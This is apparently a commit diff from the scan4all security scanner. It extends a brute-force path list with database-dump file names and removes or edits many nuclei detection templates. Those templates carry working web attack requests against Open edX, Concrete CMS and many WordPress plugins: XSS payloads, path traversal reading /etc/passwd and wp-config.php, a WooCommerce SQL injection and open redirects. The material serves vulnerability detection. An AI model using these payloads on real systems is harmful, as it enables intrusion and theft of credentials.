STRLCPY/scan4all

■ ■ ■ ■ ■ ■

brute/dicts/filedic.txt

		skipped 1595 lines
1596	1596		/access-log.1
1597	1597		/access.1
1598	1598		/access.log
	1599	+	/accounts.sql
1599	1600		/activeMQ/
1600	1601		/activemq
1601	1602		/activity
		skipped 145 lines
1747	1748		/axis2/
1748	1749		/axis2/axis2-admin/login
1749	1750		/b.php
	1751	+	/back.sql
1750	1752		/back.tar.bz2
1751	1753		/backup
1752	1754		/backup.7z
		skipped 6 lines
1759	1761		/backup.tar.gz
1760	1762		/backup.tgz
1761	1763		/backup.zip
	1764	+	/backups.sql
1762	1765		/bbs
1763	1766		/bbs.tar
1764	1767		/bbs.tar.gz
		skipped 27 lines
1792	1795		/checkLogin.do
1793	1796		/classes.war
1794	1797		/cleanup.log
	1798	+	/clients.sql
1795	1799		/cloudstore/config/mysql.xml
1796	1800		/cm.php
1797	1801		/code.tar.gz
		skipped 53 lines
1851	1855		/cri
1852	1856		/css.asp
1853	1857		/customers.log
	1858	+	/customers.sgl
1854	1859		/dama.asp
1855	1860		/dama.aspx
1856	1861		/dama.jsp
		skipped 20 lines
1877	1882		/database.log
1878	1883		/database.properties
1879	1884		/database.rar
	1885	+	/database.sgl
1880	1886		/database.sql
1881	1887		/database.sql.gz
	1888	+	/database.sqlite
1882	1889		/database.tar.bz2
1883	1890		/database.tar.gz
1884	1891		/database.tgz
		skipped 21 lines
1906	1913		/db.yaml
1907	1914		/db.yml
1908	1915		/db.zip
	1916	+	/db_backup.sql
1909	1917		/dbaccess.log
	1918	+	/dbase.sql
	1919	+	/dbdump.sql
1910	1920		/dbeaver-data-sources.xml
1911	1921		/debug
1912	1922		/debug.log
		skipped 243 lines
2156	2166		/monitoring
2157	2167		/mw-config/
2158	2168		/myadmin/login.php
	2169	+	/mysql.sql
2159	2170		/nacos/
2160	2171		/nagios
2161	2172		/nginx.conf
		skipped 162 lines
2324	2335		/sql.html
2325	2336		/sql.log
2326	2337		/sql.rar
	2338	+	/sql.sql
2327	2339		/sql.tar.bz2
2328	2340		/sql.tar.gz
2329	2341		/sql.tgz
		skipped 37 lines
2367	2379		/temp.7z
2368	2380		/temp.gz
2369	2381		/temp.rar
	2382	+	/temp.sql
2370	2383		/temp.tar.bz2
2371	2384		/temp.tar.gz
2372	2385		/temp.tgz
		skipped 100 lines
2473	2486		/uploads/dump.sql
2474	2487		/user-login.html
2475	2488		/users.log
	2489	+	/users.sql
2476	2490		/users/sign_in
2477	2491		/v1/health/service/consul
2478	2492		/v1/swagger
		skipped 9347 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-32159.yaml

1	-	id: CVE-2022-32159
2	-
3	-	info:
4	-	name: Open edX - Cross-site Scripting
5	-	author: arafatansari
6	-	severity: medium
7	-	description: \|
8	-	Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
9	-	reference:
10	-	- https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
11	-	- https://nvd.nist.gov/vuln/detail/CVE-2022-32159
12	-	- https://www.mend.io/vulnerability-database/CVE-2022-32159
13	-	- https://github.com/internetarchive/infogami/pull/195/commits/ccc2141c5fb093870c9e2742c01336ecca8cd12e
14	-	classification:
15	-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
16	-	cvss-score: 5.4
17	-	cve-id: CVE-2022-32159
18	-	cwe-id: CWE-79
19	-	metadata:
20	-	comment: Hover the cursor on the redirect link
21	-	shodan-query: http.html:"Open edX"
22	-	verified: "true"
23	-	tags: cve,cve2022,openedx,xss
24	-
25	-	requests:
26	-	- method: GET
27	-	path:
28	-	- '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
29	-
30	-	matchers-condition: and
31	-	matchers:
32	-	- type: word
33	-	part: body
34	-	words:
35	-	- '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
36	-
37	-	- type: word
38	-	part: header
39	-	words:
40	-	- text/html
41	-
42	-	- type: status
43	-	status:
44	-	- 200
45	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-38463.yaml

		skipped 9 lines
10	10		- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
11	11		- https://nvd.nist.gov/vuln/detail/CVE-2022-38463
12	12		classification:
	13	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
	14	+	cvss-score: 6.1
13	15		cve-id: CVE-2022-38463
	16	+	cwe-id: CWE-79
14	17		metadata:
15		-	verified: true
16	18		shodan-query: http.title:"ServiceNow"
	19	+	verified: "true"
17	20		tags: cve,cve2022,servicenow,xss
18		-
19	21		requests:
20	22		- method: GET
21	23		path:
		skipped 18 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/apache/tomcat-pathnormalization.yaml

1	-	id: tomcat-manager-pathnormalization
2	-
3	-	info:
4	-	name: Tomcat Manager Path Normalization
5	-	author: organiccrap
6	-	severity: info
7	-	description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target
8	-	operating system.
9	-	reference:
10	-	- https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization
11	-	- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
12	-	classification:
13	-	cwe-id: CWE-200
14	-	tags: panel,tomcat,apache
15	-
16	-	requests:
17	-	- method: GET
18	-	path:
19	-	- '{{BaseURL}}/..;/manager/html'
20	-	- '{{BaseURL}}/..;/host-manager/html'
21	-
22	-	matchers-condition: and
23	-	matchers:
24	-	- type: word
25	-	words:
26	-	- 'username="tomcat" password="s3cret"'
27	-	- 'manager-gui'
28	-	condition: and
29	-
30	-	- type: status
31	-	negative: true
32	-	status:
33	-	- 403
34	-	- 401
35	-
36	-	# Enhanced by mp on 2022/03/17
37	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/configs/magento-information-disclosure.yaml config/nuclei-templates/exposures/configs/magento-config-disclosure.yaml

1		-	id: magento-information-disclosure
	1	+	id: magento-config-disclosure
2	2
3	3		info:
4		-	name: Magento - Information Disclosure
5		-	author: ptonewreckin,danigoland
	4	+	name: Magento - Config Disclosure
	5	+	author: ptonewreckin,danigoland,geeknik
6	6		severity: high
7	7		description: \|
8	8		Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
		skipped 1 lines
10	10		- https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
11	11		metadata:
12	12		verified: true
	13	+	shodan-query: http.component:"Magento"
13	14		tags: magento,exposure,credential,config
14	15
15	16		requests:
		skipped 35 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/configs/magento-config.yaml

1	-	id: magento-config
2	-
3	-	info:
4	-	name: Magento Config Disclosure
5	-	author: geeknik
6	-	severity: medium
7	-	metadata:
8	-	shodan-query: http.component:"Magento"
9	-	tags: config,exposure,magento
10	-
11	-	requests:
12	-	- method: GET
13	-	path:
14	-	- "{{BaseURL}}/app/etc/local.xml"
15	-	- "{{BaseURL}}/store/app/etc/local.xml"
16	-
17	-	matchers-condition: and
18	-	matchers:
19	-	- type: status
20	-	status:
21	-	- 200
22	-
23	-	- type: word
24	-	words:
25	-	- "text/xml"
26	-	part: header
27	-
28	-	- type: word
29	-	words:
30	-	- "Magento"
31	-	part: body

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/unauthenticated-influxdb.yaml

1	-	id: unauthenticated-influxdb
2	-
3	-	info:
4	-	name: Unauthentication InfluxDB Detection
5	-	author: pussycat0x
6	-	severity: high
7	-	metadata:
8	-	shodan-dork: InfluxDB
9	-	tags: unauth,db,influxdb,misconfig
10	-
11	-	requests:
12	-	- method: GET
13	-	path:
14	-	- "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
15	-
16	-	matchers-condition: and
17	-	matchers:
18	-	- type: word
19	-	part: body
20	-	words:
21	-	- '"results":'
22	-	- '"name":"databases"'
23	-	condition: and
24	-
25	-	- type: status
26	-	status:
27	-	- 200

■ ■ ■ ■ ■ ■

config/nuclei-templates/takeovers/wix-takeover.yaml

		skipped 16 lines
17	17		matchers-condition: and
18	18		matchers:
19	19		- type: word
20		-	condition: or
21	20		words:
22	21		- 'Error ConnectYourDomain occurred'
23	22		- 'wixErrorPagesApp'
	23	+	condition: and
24	24
25	25		- type: status
26	26		status:
		skipped 1 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/tb.sh

1	-	myrsync ./ $HOME/MyWork/scan4all/config/nuclei-templates
2	-
3	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/concrete-xss.yaml

1	-	id: concrete-xss
2	-
3	-	info:
4	-	name: Unauthenticated reflected XSS in preview_as_user function
5	-	author: shifacyclewla,hackergautam
6	-	severity: medium
7	-	description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
8	-	reference:
9	-	- https://hackerone.com/reports/643442
10	-	- https://github.com/concrete5/concrete5/pull/7999
11	-	- https://twitter.com/JacksonHHax/status/1389222207805661187
12	-	tags: concrete,xss,cms
13	-
14	-	requests:
15	-	- method: GET
16	-	path:
17	-	- '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
18	-
19	-	matchers-condition: and
20	-	matchers:
21	-	- type: word
22	-	part: body
23	-	words:
24	-	- '</iframe><svg/onload=alert("{{randstr}}")>'
25	-
26	-	- type: word
27	-	part: header
28	-	words:
29	-	- "text/html"
30	-	- "CONCRETE5"
31	-	condition: and
32	-
33	-	- type: status
34	-	status:
35	-	- 200

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/gnuboard-sms-xss.yaml

1	-	id: gnuboard-sms-xss
2	-
3	-	info:
4	-	name: Gnuboard CMS - SMS Emoticon XSS
5	-	author: gy741
6	-	severity: medium
7	-	description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
8	-	reference:
9	-	- https://sir.kr/g5_pds/4788?page=5
10	-	- https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
11	-	metadata:
12	-	verified: true
13	-	shodan-query: http.html:"Gnuboard"
14	-	tags: xss,gnuboard
15	-
16	-	requests:
17	-	- method: GET
18	-	path:
19	-	- "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
20	-
21	-	matchers-condition: and
22	-	matchers:
23	-	- type: word
24	-	part: body
25	-	words:
26	-	- '"0nuboard<svg onload=alert(document.domain)>"'
27	-
28	-	- type: word
29	-	part: header
30	-	words:
31	-	- "text/html"
32	-
33	-	- type: status
34	-	status:
35	-	- 200
36	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/accessibility-helper-xss.yaml

1	-	id: accessibility-helper-xss
2	-
3	-	info:
4	-	name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
5	-	author: dhiyaneshDK
6	-	severity: medium
7	-	description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
8	-	reference:
9	-	- https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
10	-	tags: xss,wordpress,wp-plugin,wp
11	-
12	-	requests:
13	-	- method: GET
14	-	path:
15	-	- '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
16	-
17	-	matchers-condition: and
18	-	matchers:
19	-	- type: word
20	-	part: body
21	-	words:
22	-	- "var wah_target_src = '';alert(document.domain);//';"
23	-
24	-	- type: word
25	-	part: header
26	-	words:
27	-	- text/html
28	-
29	-	- type: status
30	-	status:
31	-	- 200
32	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml

1	-	id: admin-word-count-column-lfi
2	-
3	-	info:
4	-	name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
5	-	author: daffainfo,Splint3r7
6	-	severity: high
7	-	description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
8	-	reference:
9	-	- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
10	-	- https://wordpress.org/plugins/admin-word-count-column/
11	-	remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
12	-	classification:
13	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14	-	cvss-score: 7.5
15	-	cwe-id: CWE-22
16	-	tags: wordpress,wp-plugin,lfi,wp
17	-
18	-	requests:
19	-	- method: GET
20	-	path:
21	-	- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
22	-
23	-	matchers-condition: and
24	-	matchers:
25	-	- type: regex
26	-	regex:
27	-	- "root:[x*]:0:0"
28	-
29	-	- type: status
30	-	status:
31	-	- 200
32	-
33	-	# Enhanced by mp on 2022/08/01
34	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml

1	-	id: cab-fare-calculator-lfi
2	-
3	-	info:
4	-	name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion
5	-	author: Hassan Khan Yusufzai - Splint3r7
6	-	severity: high
7	-	description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
8	-	reference:
9	-	- https://www.exploit-db.com/exploits/50843
10	-	- https://wordpress.org/plugins/cab-fare-calculator
11	-	classification:
12	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13	-	cvss-score: 7.5
14	-	cwe-id: CWE-22
15	-	tags: wordpress,wp-plugin,lfi,wp
16	-
17	-	requests:
18	-	- method: GET
19	-	path:
20	-	- '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
21	-
22	-	matchers-condition: and
23	-	matchers:
24	-	- type: regex
25	-	regex:
26	-	- "root:[x*]:0:0"
27	-
28	-	- type: status
29	-	status:
30	-	- 200
31	-
32	-	# Enhanced by mp on 2022/08/01
33	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/candidate-application-lfi.yaml

1	-	id: candidate-application-lfi
2	-
3	-	info:
4	-	name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
5	-	author: dhiyaneshDK
6	-	severity: high
7	-	description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
8	-	reference:
9	-	- https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
10	-	classification:
11	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
12	-	cvss-score: 8.6
13	-	cwe-id: CWE-22
14	-	tags: wordpress,wp-plugin,lfi,wp
15	-
16	-	requests:
17	-	- method: GET
18	-	path:
19	-	- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
20	-
21	-	matchers-condition: and
22	-	matchers:
23	-	- type: regex
24	-	regex:
25	-	- "root:[x*]:0:0"
26	-
27	-	- type: status
28	-	status:
29	-	- 200
30	-
31	-	# Enhanced by mp on 2022/04/21
32	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/db-backup-lfi.yaml

1	-	id: db-backup-lfi
2	-
3	-	info:
4	-	name: WordPress DB Backup <=4.5 - Local File Inclusion
5	-	author: dhiyaneshDK
6	-	severity: high
7	-	description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
8	-	reference:
9	-	- https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
10	-	- https://www.exploit-db.com/exploits/35378
11	-	classification:
12	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13	-	cvss-score: 7.5
14	-	cwe-id: CWE-22
15	-	tags: wordpress,wp-plugin,lfi,wp
16	-
17	-	requests:
18	-	- method: GET
19	-	path:
20	-	- '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
21	-
22	-	matchers-condition: and
23	-	matchers:
24	-	- type: word
25	-	part: body
26	-	words:
27	-	- "DB_NAME"
28	-	- "DB_PASSWORD"
29	-	condition: and
30	-
31	-	- type: status
32	-	status:
33	-	- 200
34	-
35	-	# Enhanced by mp on 2022/08/05
36	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/feedwordpress-xss.yaml

1	-	id: feedwordpress-xss
2	-
3	-	info:
4	-	name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
5	-	author: dhiyaneshDk
6	-	severity: medium
7	-	description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
8	-	reference:
9	-	- https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
10	-	tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
11	-
12	-	requests:
13	-	- raw:
14	-	- \|
15	-	POST /wp-login.php HTTP/1.1
16	-	Host: {{Hostname}}
17	-	Origin: {{RootURL}}
18	-	Content-Type: application/x-www-form-urlencoded
19	-	Cookie: wordpress_test_cookie=WP%20Cookie%20check
20	-
21	-	log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
22	-	- \|
23	-	GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
24	-	Host: {{Hostname}}
25	-
26	-	cookie-reuse: true
27	-	matchers-condition: and
28	-	matchers:
29	-	- type: word
30	-	part: body
31	-	words:
32	-	- '"><img src=2 onerror=alert(document.domain)>" method="post">'
33	-
34	-	- type: word
35	-	part: header
36	-	words:
37	-	- text/html
38	-
39	-	- type: status
40	-	status:
41	-	- 200
42	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml

1	-	id: newsletter-manager-open-redirect
2	-
3	-	info:
4	-	name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
5	-	author: akincibor
6	-	severity: low
7	-	description: \|
8	-	The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
9	-	reference:
10	-	- https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
11	-	metadata:
12	-	verified: true
13	-	tags: wp-plugin,redirect,wordpress,wp,unauth
14	-
15	-	requests:
16	-	- method: GET
17	-	path:
18	-	- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
19	-
20	-	matchers:
21	-	- type: regex
22	-	part: header
23	-	regex:
24	-	- '(?m)^(?:Location\s?:\s?)(?:https?:\/\/\|\/\/\|\/\\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@])interact\.sh\/?(\/\|[^.].)?$' # https://regex101.com/r/ZDYhFh/1
25	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/ninjaform-open-redirect.yaml

1	-	id: ninjaform-open-redirect
2	-
3	-	info:
4	-	name: Ninja Forms < 3.4.34 - Administrator Open Redirect
5	-	author: dhiyaneshDk,daffainfo
6	-	severity: low
7	-	description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
8	-	reference:
9	-	- https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
10	-	tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp
11	-
12	-	requests:
13	-	- raw:
14	-	- \|
15	-	POST /wp-login.php HTTP/1.1
16	-	Host: {{Hostname}}
17	-	Origin: {{RootURL}}
18	-	Content-Type: application/x-www-form-urlencoded
19	-	Cookie: wordpress_test_cookie=WP%20Cookie%20check
20	-
21	-	log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
22	-
23	-	- \|
24	-	GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
25	-	Host: {{Hostname}}
26	-
27	-	req-condition: true
28	-	cookie-reuse: true
29	-	matchers:
30	-	- type: dsl
31	-	dsl:
32	-	- 'status_code_1 == 302'
33	-	- 'status_code_2 == 302'
34	-	- "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
35	-	condition: and
36	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml

1	-	id: simple-image-manipulator-lfi
2	-
3	-	info:
4	-	name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
5	-	author: dhiyaneshDK
6	-	severity: high
7	-	description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
8	-	reference:
9	-	- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
10	-	classification:
11	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
12	-	cvss-score: 7.5
13	-	cwe-id: CWE-22
14	-	tags: wordpress,wp-plugin,lfi,wp
15	-
16	-	requests:
17	-	- method: GET
18	-	path:
19	-	- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
20	-
21	-	matchers-condition: and
22	-	matchers:
23	-	- type: regex
24	-	regex:
25	-	- "root:[x*]:0:0"
26	-
27	-	- type: status
28	-	status:
29	-	- 200
30	-
31	-	# Enhanced by mp on 2022/07/29
32	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/sniplets-lfi.yaml

1	-	id: sniplets-lfi
2	-
3	-	info:
4	-	name: WordPress Sniplets 1.1.2 - Local File Inclusion
5	-	author: dhiyaneshDK
6	-	severity: high
7	-	description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
8	-	reference:
9	-	- https://www.exploit-db.com/exploits/5194
10	-	classification:
11	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
12	-	cvss-score: 7.5
13	-	cwe-id: CWE-22
14	-	tags: wordpress,wp-plugin,lfi,wp
15	-
16	-	requests:
17	-	- method: GET
18	-	path:
19	-	- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
20	-
21	-	matchers-condition: and
22	-	matchers:
23	-	- type: word
24	-	part: body
25	-	words:
26	-	- "DB_NAME"
27	-	- "DB_PASSWORD"
28	-	condition: and
29	-
30	-	- type: status
31	-	status:
32	-	- 200
33	-
34	-	# Enhanced by mp on 2022/07/29
35	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/sniplets-xss.yaml

1	-	id: sniplets-xss
2	-
3	-	info:
4	-	name: Wordpress Plugin Sniplets - Cross-Site Scripting
5	-	author: dhiyaneshDK
6	-	severity: medium
7	-	description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
8	-	reference:
9	-	- https://www.exploit-db.com/exploits/5194
10	-	tags: xss,wordpress,wp-plugin,wp
11	-
12	-	requests:
13	-	- method: GET
14	-	path:
15	-	- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
16	-
17	-	matchers-condition: and
18	-	matchers:
19	-	- type: word
20	-	part: body
21	-	words:
22	-	- "</script><script>alert(document.domain)</script>"
23	-
24	-	- type: word
25	-	part: header
26	-	words:
27	-	- text/html
28	-
29	-	- type: status
30	-	status:
31	-	- 200
32	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml

1	-	id: video-synchro-pdf-lfi
2	-
3	-	info:
4	-	name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
5	-	author: Hassan Khan Yusufzai - Splint3r7
6	-	severity: high
7	-	description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
8	-	reference:
9	-	- https://www.exploit-db.com/exploits/50844
10	-	- https://wordpress.org/plugins/video-synchro-pdf/
11	-	classification:
12	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13	-	cvss-score: 7.5
14	-	cwe-id: CWE-22
15	-	tags: wordpress,wp-plugin,lfi,wp
16	-
17	-	requests:
18	-	- method: GET
19	-	path:
20	-	- '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
21	-
22	-	matchers-condition: and
23	-	matchers:
24	-	- type: regex
25	-	regex:
26	-	- "root:[x*]:0:0"
27	-
28	-	- type: status
29	-	status:
30	-	- 200
31	-
32	-	# Enhanced by mp on 2022/07/29
33	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml

1	-	id: wordpress-woocommerce-sqli
2	-
3	-	info:
4	-	name: Woocommerce Unauthenticated SQL Injection
5	-	author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
6	-	severity: critical
7	-	description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
8	-	reference:
9	-	- https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
10	-	- https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
11	-	- https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
12	-	classification:
13	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
14	-	cvss-score: 10.0
15	-	cwe-id: CWE-89
16	-	tags: wordpress,woocommerce,sqli,wp-plugin,injection
17	-
18	-	requests:
19	-	- method: GET
20	-	path:
21	-	- '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
22	-	- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
23	-
24	-	matchers-condition: and
25	-	matchers:
26	-	- type: word
27	-	words:
28	-	- 'sqli-test'
29	-	- 'attribute_counts'
30	-	- 'price_range'
31	-	- 'term'
32	-	condition: and
33	-
34	-	- type: word
35	-	words:
36	-	- 'application/json'
37	-	part: header
38	-
39	-	- type: status
40	-	status:
41	-	- 200
42	-
43	-	# Enhanced by mp on 2022/03/21
44	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wp-church-admin-xss.yaml

1	-	id: wp-church-admin-xss
2	-
3	-	info:
4	-	name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
5	-	author: daffainfo
6	-	severity: medium
7	-	reference:
8	-	- https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
9	-	tags: wordpress,xss,wp-plugin
10	-
11	-	requests:
12	-	- method: GET
13	-	path:
14	-	- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
15	-
16	-	matchers-condition: and
17	-	matchers:
18	-	- type: word
19	-	words:
20	-	- "</script><script>alert(document.domain)</script>"
21	-	part: body
22	-
23	-	- type: word
24	-	part: header
25	-	words:
26	-	- text/html
27	-
28	-	- type: status
29	-	status:
30	-	- 200
31	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wp-revslider-file-download.yaml

1	-	id: wp-revslider-file-download
2	-
3	-	info:
4	-	name: Wordpress Revslider - Local File Inclusion
5	-	author: pussycat0x
6	-	severity: high
7	-	description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
8	-	reference:
9	-	- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
10	-	- https://cxsecurity.com/issue/WLB-2021090129
11	-	classification:
12	-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13	-	cvss-score: 7.5
14	-	cwe-id: CWE-22
15	-	metadata:
16	-	google-dork: inurl:/wp-content/plugins/revslider
17	-	tags: wordpress,wp-plugin,lfi,revslider
18	-
19	-	requests:
20	-	- method: GET
21	-	path:
22	-	- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
